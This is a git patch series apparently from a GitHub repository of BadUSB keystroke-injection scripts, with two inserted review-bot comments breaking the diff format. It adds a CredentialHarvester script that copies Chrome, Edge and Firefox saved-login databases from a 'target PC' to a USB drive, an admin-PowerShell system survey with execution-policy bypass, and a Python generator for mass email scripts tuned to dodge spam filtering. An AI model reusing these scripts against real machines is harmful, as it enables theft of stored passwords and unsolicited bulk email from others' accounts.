-DELAY 5000
-DELAY 1000
-ALT F4
-REM Check out github.com/MarkCyber for more scripts
From f665892aca1fe6d66ca3ebb1f03b3ca2b02adc4a Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 15:05:45 -0400
Subject: [PATCH 23/33] Create EmailSender.txt
--- .../MarkCyber-BadUSB/Emails/EmailSender.txt | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt new file mode 100644
index 00000000..f484d3ec
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
@@ -0,0 +1,41 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
+REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
+REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 500
+STRING chrome
+ENTER
+DELAY 1000
+STRING https://mail.google.com/mail/u/0/#inbox?compose=new
+ENTER
+DELAY 5000
+DELAY 1000
+STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
+DELAY 500
+TAB
+TAB
+STRING {YOUR SUBJECT NAME}
+TAB
+STRING Hi {THEIR NAME}
+ENTER
+ENTER
+STRING {CONTENTS OF THE EMAIL}
+ENTER
+ENTER
+STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
+ENTER
+ENTER
+STRING Respectfully,
+ENTER
+ENTER
+STRING {YOUR NAME}
+ENTER
+CTRL ENTER
+DELAY 5000
+DELAY 1000
+ALT F4
From bfd20c8921233ff69ecb118a5367a7db91d1e01f Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:23:31 -0400
Subject: [PATCH 24/33] Create EmailSender.txt
--- .../BadUSB-MarkCyber/Emails/EmailSender.txt | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt new file mode 100644
index 00000000..f484d3ec
--- /dev/null
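Review bot: This creates BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt as blob f484d3ec, and PATCH 24 creates the very same blob f484d3ec at BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt, so after the series two identical copies exist and they diverge immediately — PATCH 26 appends its trailing REM to the BadUSB-MarkCyber copy only. The same duplication happens with CredentialHarvester.txt: the HackerStuff copy (PATCH 14/16, blob d7a27cea) and the HackStuff copy (PATCH 25/28, also d7a27cea) end up byte-identical in two trees. I would keep one canonical path per script and express moves as a single rename; PATCH 11–13 and PATCH 21–24 each delete and recreate a file that a plain `git mv` would have carried along with its history. Compared with the copy removed in PATCH 22 (blob a3eadd1c), this version only drops the final `REM Check out github.com/MarkCyber for more scripts` line.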
+++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
@@ -0,0 +1,41 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
+REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
+REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 500
+STRING chrome
+ENTER
+DELAY 1000
+STRING https://mail.google.com/mail/u/0/#inbox?compose=new
+ENTER
+DELAY 5000
+DELAY 1000
+STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
+DELAY 500
+TAB
+TAB
+STRING {YOUR SUBJECT NAME}
+TAB
+STRING Hi {THEIR NAME}
+ENTER
+ENTER
+STRING {CONTENTS OF THE EMAIL}
+ENTER
+ENTER
+STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
+ENTER
+ENTER
+STRING Respectfully,
+ENTER
+ENTER
+STRING {YOUR NAME}
+ENTER
+CTRL ENTER
+DELAY 5000
+DELAY 1000
+ALT F4
From fe1df5f6bf3a0dd5703dff27d9d1bcd8dc592dcc Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:24:07 -0400
Subject: [PATCH 25/33] Create CredentialHarvester.txt
--- .../HackStuff/CredentialHarvester.txt | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt new file mode 100644
index 00000000..809d3759
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
@@ -0,0 +1,53 @@
+REM ##################################################################################################################
+REM ############## This script was created by github.com/markcyber ##############
+REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
+REM ############## The extracted data will require decryption ##############
+REM ##################################################################################################################
+REM Open PowerShell with elevated privileges
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500
From 91bdc6a02bd9fd0383bea5db36f77d924dbe02c2 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkC​yber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:25:17 -0400
Subject: [PATCH 26/33] Update EmailSender.txt
--- BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt | 1 + 1 file changed, 1 insertion(+)
diff --git a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
index f484d3ec..0a33b3bd 100644
--- a/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
+++ b/BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
@@ -39,3 +39,4 @@ CTRL ENTER
 DELAY 5000
 DELAY 1000
 ALT F4
+REM check out github.com/markcyber for more scripts
From 5f95a6d34946ca1554ebd1e8f5cf61afe712db24 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:25:52 -0400
Subject: [PATCH 27/33] Create GenerateEmailScripts.py
--- .../Emails/GenerateEmailScripts.py | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
diff --git a/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py new file mode 100644
index 00000000..16662391
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
@@ -0,0 +1,101 @@
+#######################################################################################################################################
+#######################################################################################################################################
+################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
+################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
+################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
+################# This script will then make a badusb script using the name + email of each person ####################
+################# There are various subject options that will be chosen from, to minimize "spam" ####################
+################# Change the signature to your name, and put subject options that fit your email ####################
+################# Lastly, of course make sure to change the contents of the email to what you want ####################
+#######################################################################################################################################
+#######################################################################################################################################
+
+import pandas as pd
+import random
+
+# Load the Excel file, make sure it has the same name (or change the name in this script)
+file_path = 'NameAndEmails.xlsx'
+data_df = pd.read_excel(file_path)
+
+# Your excel should have 2 columns. Names, and Emails.
+data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
+data_cleaned_df.columns = ['Name', 'Email']
+
+# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. 
You can use the same if not)
+subject_options = [
+ "Placeholder for subject option 1",
+ "Placeholder for subject option 2",
+ "Placeholder for subject option 3",
+ "Placeholder for subject option 4",
+ "Placeholder for subject option 5",
+ "Placeholder for subject option 6",
+ "Placeholder for subject option 7"
+]
+
+# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
+# Just modify the actual email body and sender name to fit your needs
+email_body_template = """
+Hi {name},
+
+Placeholder for email body.
+
+Warm Regards,
+Sender Name
+"""
+
+# Function to generate BadUSB script
+def generate_badusb_script_with_placeholders_single_file(data_df):
+ script_template = [
+ "DELAY 1000",
+ "GUI r",
+ "DELAY 500",
+ "STRING chrome",
+ "ENTER",
+ "DELAY 1000",
+ "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
+ "ENTER",
+ "DELAY 5000"
+ ]
+
+ scripts = script_template
+
+ for index, row in data_df.iterrows():
+ name = row['Name']
+ email = row['Email']
+ subject = random.choice(subject_options)
+ random_delay = random.randint(10000, 25000)
+
+ email_body_lines = email_body_template.format(name=name).strip().split('\n')
+ email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
+
+ email_script = [
+ "DELAY 1000",
+ f"STRING {email}",
+ "DELAY 500",
+ "TAB",
+ "TAB",
+ f"STRING {subject}",
+ "TAB"
+ ] + email_body_lines + [
+ "ENTER",
+ "CONTROL ENTER",
+ "DELAY 5000",
+ f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
+ "ALT F4"
+ ]
+
+ scripts += email_script
+
+ return "\n".join(scripts)
+
+# Generate the BadUSB script with placeholders and proper send command in a single file
+final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
+
+# 
Save the script to a file
+final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
+with open(final_script_file_path, 'w') as file:
+ file.write(final_script_with_placeholders)
+
+print(f"Script saved to {final_script_file_path}")
+
+#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
From 9109f85a8ecd1c5026fa803afa88deca818241fc Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:26:17 -0400
Subject: [PATCH 28/33] Update CredentialHarvester.txt
--- BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
index 809d3759..d7a27cea 100644
--- a/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
+++ b/BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
@@ -3,7 +3,7 @@ REM ############## This script was created by github.com/markcyb
 REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
 REM ############## The extracted data will require decryption ##############
 REM ##################################################################################################################
-REM Open PowerShell with elevated privileges
+REM Open PowerShell
 DELAY 1000
 GUI r
 DELAY 500
@@ -51,3 +51,4 @@ REM Close PowerShell
 STRING exit
 ENTER
 DELAY 500
+REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff
From 11e02f29316f914e92dedaf487214a0e07c9afd8 Mon Sep 17 00:00:00 2001
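Review bot: `scripts = script_template` inside `generate_badusb_script_with_placeholders_single_file` binds a second name to the same list object, and the later `scripts += email_script` extends that list in place, so the module-level `script_template` is mutated and a second call to the function would start with the previous run's per-recipient lines already appended; `scripts = list(script_template)` keeps the template intact. The function also has no docstring; a one-liner saying it takes a DataFrame with `Name` and `Email` columns and returns the complete script as one newline-joined string would help, and the unused loop variable `index` can be `_`. The indentation of the added Python lines is not recoverable from this rendering of the patch, so I have not commented on layout.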
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 16:26:46 -0400
Subject: [PATCH 29/33] Create VulnerabilityScanner.txt
--- .../HackStuff/VulnerabilityScanner.txt | 630 ++++++++++++++++++ 1 file changed, 630 insertions(+) create mode 100644 BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt
diff --git a/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt new file mode 100644
index 00000000..51e1b0d0
--- /dev/null
+++ b/BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt
@@ -0,0 +1,630 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+REM Open Start Menu
+CONTROL ESCAPE
+DELAY 2000
+STRING powershell
+REM Navigate to the context menu to run PowerShell as an administrator
+DELAY 500
+RIGHTARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 3000
+ALT Y
+DELAY 5000
+REM Set PowerShell Execution Policy to Bypass
+DELAY 1000
+STRING set-executionpolicy bypass -scope process -force
+DELAY 200
+ENTER
+DELAY 200
+REM Create the PowerShell script in memory and execute it
+DELAY 200
+STRING $usbName = "MYUSB"
+DELAY 200
+ENTER
+DELAY 200
+STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($usbDrive) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
+DELAY 200
+ENTER
+DELAY 200
+STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
+DELAY 200
+ENTER
+DELAY 200
+STRING New-Item -ItemType Directory -Path $directoryPath
+DELAY 200
+ENTER
+DELAY 200
+STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
+DELAY 200
+ENTER
+DELAY 200
+STRING "" > $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-passwordpolicy {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING net accounts
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking password policy: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function audit-services {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-service | select-object name, displayname, status, starttype
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error auditing services: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-networksettings {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-netipconfiguration
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking network settings: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-softwarevulnerabilities {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking software vulnerabilities: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-cve {
+DELAY 200
+ENTER
+DELAY 200
+STRING param (
+DELAY 200
+ENTER
+DELAY 200
+STRING [string]$productname,
+DELAY 200
+ENTER
+DELAY 200
+STRING [string]$version
+DELAY 200
+ENTER
+DELAY 200
+STRING )
+DELAY 200
+ENTER
+DELAY 200
+STRING $initialDelay = 2
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds $initialDelay
+DELAY 200
+ENTER
+DELAY 200
+STRING $response = invoke-restmethod -uri $uri -method get
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($response.totalresults -gt 0) {
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($cve in $response.result.cve_items) {
+DELAY 200
+ENTER
+DELAY 200
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING "no cves found for $productname $version"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking CVEs: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($_.Exception -match '403') {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds 60
+DELAY 200
+ENTER
+DELAY 200
+STRING $retryResponse = invoke-restmethod -uri $uri -method get
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($retryResponse.totalresults -gt 0) {
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($cve in $retryResponse.result.cve_items) {
+DELAY 200
+ENTER
+DELAY 200
+STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING "no cves found for $productname $version"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function analyze-logs {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-eventlog -logname system -newest 100
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error analyzing logs: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-openports {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING netstat -an
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking open ports: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-missingupdates {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Checking Windows Update logs..."
+DELAY 200
+ENTER
+DELAY 200
+STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
+DELAY 200
+ENTER
+DELAY 200
+STRING Get-WindowsUpdateLog -LogPath $updateLogPath
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "WindowsUpdate.log written to $updateLogPath"
+DELAY 200
+ENTER
+DELAY 200
+STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error getting Windows Update log: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-firewallstatus {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING netsh advfirewall show allprofiles
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking firewall status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-smbv1status {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-windowsoptionalfeature -online -featurename smb1protocol
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking SMBv1 status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-antivirusstatus {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-mpcomputerstatus
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking antivirus status: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING check-passwordpolicy >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING audit-services >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-networksettings >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-softwarevulnerabilities >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING analyze-logs >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-openports >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-missingupdates >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-firewallstatus >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-smbv1status >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING check-antivirusstatus >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+REM Dynamically identify critical software from running processes and scheduled tasks
+STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
+DELAY 200
+ENTER
+DELAY 200
+STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
+DELAY 200
+ENTER
+DELAY 200
+REM Combine running software and scheduled tasks
+STRING $softwareList = @()
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($process in $runningSoftware) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $softwareList += $process.Name
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING foreach ($task in $scheduledTasks) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+REM Remove duplicates and empty entries
+STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
+DELAY 200
+ENTER
+DELAY 200
+REM Check CVEs for identified software
+STRING foreach ($software in $softwareList) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($version) {
+DELAY 200
+ENTER
+DELAY 200
+STRING check-cve -productname $software -version $version >> $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
+DELAY 200
+ENTER
+DELAY 200
+STRING start-sleep -seconds $initialDelay
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Results saved to USB drive."
+DELAY 200
+ENTER
+DELAY 200
+STRING } else {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error: USB drive MYUSB not found."
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING invoke-command -scriptblock $script
+DELAY 200
+ENTER
+DELAY 20000
+REM check out github.com/markcyber for more badusb/pen testing scripts and tools
From e8a708408e614b268093919b04b786a30b5c02de Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
